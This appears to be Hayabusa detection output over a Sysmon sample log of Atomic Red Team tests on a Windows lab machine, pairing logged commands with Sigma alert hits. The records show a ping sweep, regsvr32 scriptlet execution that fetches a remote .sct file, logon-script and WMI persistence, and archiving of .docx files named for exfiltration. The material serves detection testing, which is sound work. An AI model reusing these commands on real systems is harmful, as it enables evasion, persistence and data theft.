2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.240 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D96E-5D31-0000-00106E823700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.241 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D96F-5D31-0000-00105A853700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.242 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3556 | PGUID: 747F3D96-D96F-5D31-0000-0010C78F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.243 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3788 | PGUID: 747F3D96-D970-5D31-0000-0010B4923700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.244 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D970-5D31-0000-0010A0953700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.245 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2700 | PGUID: 747F3D96-D971-5D31-0000-00108C983700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.246 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 352 | PGUID: 747F3D96-D971-5D31-0000-0010789B3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.247 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3120 | PGUID: 747F3D96-D972-5D31-0000-00106BA43700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.248 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6976 | PGUID: 747F3D96-D972-5D31-0000-001057A73700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.249 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D973-5D31-0000-0010A3AA3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.250 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5100 | PGUID: 747F3D96-D973-5D31-0000-00108FAD3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.251 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D974-5D31-0000-00107BB03700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.252 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D974-5D31-0000-001068B33700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.253 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D974-5D31-0000-001006BD3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.254 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1624 | PGUID: 747F3D96-D975-5D31-0000-001099C23700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6412 | PGUID: 747F3D96-D976-5D31-0000-00104AC63700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6292 | PGUID: 747F3D96-D976-5D31-0000-0010DBCC3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Network Command,,rules/sigma/process_creation/proc_creation_win_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:53:42.301 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: arp -a | Process: C:\Windows\System32\ARP.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D976-5D31-0000-001034CF3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D976-5D31-0000-0010D8D53700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4444 | PGUID: 747F3D96-D976-5D31-0000-001041E83700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2332 | PGUID: 747F3D96-D976-5D31-0000-001093EA3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags 
Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 3848 | PGUID: 747F3D96-D977-5D31-0000-00100A0E3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1476 | PGUID: 747F3D96-D977-5D31-0000-0010771B3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D978-5D31-0000-0010442F3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6152 | PGUID: 747F3D96-D978-5D31-0000-00101E7A3800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 4336 | PGUID: 
747F3D96-D97A-5D31-0000-00105DA83800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7148 | PGUID: 747F3D96-D97A-5D31-0000-001089BD3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49728 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3564 | PGUID: 747F3D96-D97A-5D31-0000-00109DDC3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 
Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D97A-5D31-0000-001019DE3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4628 | PGUID: 747F3D96-D97A-5D31-0000-00102BE33800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | LID: 0x50951 | PID: 5788 | PGUID: 747F3D96-D97B-5D31-0000-00109DEB3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D97B-5D31-0000-0010F0F03800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4240 | PGUID: 747F3D96-D982-5D31-0000-0010DC633900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D983-5D31-0000-00102E663900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts 
(UserInitMprLogonScript),,rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Persis | LatMov,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Persis,Common Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_common.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D989-5D31-0000-0010FC7B3900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2000 | PGUID: 747F3D96-D998-5D31-0000-001008B43900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2424 | PGUID: 
747F3D96-D998-5D31-0000-00101BB73900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:57.044 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 